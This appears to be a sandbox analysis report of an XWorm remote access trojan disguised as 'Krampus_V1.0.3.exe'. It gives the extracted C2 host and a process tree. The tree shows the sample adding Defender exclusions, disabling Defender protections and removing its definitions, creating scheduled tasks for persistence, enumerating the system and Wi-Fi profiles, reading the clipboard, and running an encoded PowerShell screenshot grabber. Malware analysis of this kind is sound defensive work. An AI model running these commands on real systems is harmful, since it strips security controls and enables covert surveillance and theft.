Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    16s
  • max time network
    25s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/04/2024, 18:04

General

  • Target

    https://cdn.discordapp.com/attachments/1179648770095448204/1230249076235173948/Krampus_V1.0.3.exe?ex=6632a1bc&is=66202cbc&hm=f630c8a70eb9ff386d3c4988ec7bab629c2dd21707b9d0a7058efd2eb356b3d2&

Malware Config

Extracted

Family

xworm

C2

north-untitled.gl.at.ply.gg:29298

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    discord.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1179648770095448204/1230249076235173948/Krampus_V1.0.3.exe?ex=6632a1bc&is=66202cbc&hm=f630c8a70eb9ff386d3c4988ec7bab629c2dd21707b9d0a7058efd2eb356b3d2&
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ff9c869ab58,0x7ff9c869ab68,0x7ff9c869ab78
      2⤵
        PID:2564
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:2
        2⤵
          PID:3736
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
          2⤵
            PID:3204
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
            2⤵
              PID:2184
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2992 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:1
              2⤵
                PID:4816
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:1
                2⤵
                  PID:2208
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4584 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                  2⤵
                    PID:3312
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4624 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                    2⤵
                      PID:3192
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                      2⤵
                        PID:612
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                        2⤵
                          PID:3464
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                          2⤵
                            PID:8
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4976 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                            2⤵
                              PID:2948
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4696 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                              2⤵
                                PID:4752
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4028 --field-trial-handle=1912,i,5741349976901970162,5922653613084275007,131072 /prefetch:8
                                2⤵
                                  PID:5380
                                • C:\Users\Admin\Downloads\Krampus_V1.0.3.exe
                                  "C:\Users\Admin\Downloads\Krampus_V1.0.3.exe"
                                  2⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in System32 directory
                                  PID:5420
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\test.bat'
                                    3⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5604
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\test.bat" "
                                    3⤵
                                      PID:5804
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\XClient.exe'
                                      3⤵
                                        PID:5824
                                      • C:\Windows\System32\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /Create /F /TN "XClient" /SC ONLOGON /TR "C:\Windows\System32\XClient.exe" /RL HIGHEST
                                        3⤵
                                        • Creates scheduled task(s)
                                        PID:5340
                                      • C:\Windows\System32\XClient.exe
                                        "C:\Windows\System32\XClient.exe"
                                        3⤵
                                          PID:5364
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\XClient.exe'
                                            4⤵
                                              PID:4372
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
                                            3⤵
                                              PID:5408
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:5688
                                            • C:\Windows\System32\Built.exe
                                              "C:\Windows\System32\Built.exe"
                                              3⤵
                                                PID:5844
                                                • C:\Windows\System32\Built.exe
                                                  "C:\Windows\System32\Built.exe"
                                                  4⤵
                                                    PID:6064
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"
                                                      5⤵
                                                        PID:1544
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
                                                          6⤵
                                                            PID:3788
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                          5⤵
                                                            PID:2792
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                              6⤵
                                                                PID:3784
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
                                                              5⤵
                                                                PID:2788
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
                                                                  6⤵
                                                                    PID:5904
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                  5⤵
                                                                    PID:5868
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /FO LIST
                                                                      6⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:5736
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    5⤵
                                                                      PID:5448
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist /FO LIST
                                                                        6⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:2208
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                      5⤵
                                                                        PID:1600
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                          6⤵
                                                                            PID:5600
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                          5⤵
                                                                            PID:4856
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-Clipboard
                                                                              6⤵
                                                                                PID:6084
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                              5⤵
                                                                                PID:5460
                                                                                • C:\Windows\system32\tasklist.exe
                                                                                  tasklist /FO LIST
                                                                                  6⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  PID:5420
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                5⤵
                                                                                  PID:2536
                                                                                  • C:\Windows\system32\tree.com
                                                                                    tree /A /F
                                                                                    6⤵
                                                                                      PID:5872
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                    5⤵
                                                                                      PID:384
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh wlan show profile
                                                                                        6⤵
                                                                                          PID:4668
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                        5⤵
                                                                                          PID:1876
                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                            systeminfo
                                                                                            6⤵
                                                                                            • Gathers system information
                                                                                            PID:3340
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                          5⤵
                                                                                            PID:4496
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                              6⤵
                                                                                                PID:5056
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                              5⤵
                                                                                                PID:5368
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                  6⤵
                                                                                                    PID:5852
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
